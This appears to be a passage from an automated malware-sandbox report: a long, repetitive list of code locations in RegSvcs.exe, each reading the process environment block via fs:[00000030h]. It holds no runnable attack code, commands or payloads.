            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012999BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012999BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012999BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012999BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012999BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013349A4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AA185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013041E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01344015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01344015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01332073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01341074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01290050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01290050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B90AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A20A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AF0BF mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AF0BF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01279080 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F3884 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012740E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012740E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012740E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012758EC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129B8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130B8D0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0130B8D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133131B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127DB60 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A3B7A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127DB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348B58 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127F358 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A4BAD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01345BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01281B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01281B8F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0132D380 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133138A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AB390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A03E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129A229 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B4A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01288A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01293A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01275210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01275210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01275210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01275210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0132B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0132B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01279240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01279240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01279240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01279240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01304257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012752A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AFAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AD294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0127AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012FA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01283D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0129C577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012B3D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F3540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01323D40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01297D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013405AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013405AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012A2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01272D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01272D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01272D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01272D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01272D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012AFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01328DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0128D5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0133FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012F6DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_012ABC2C mov eax, dword ptr fs:[00000030h]
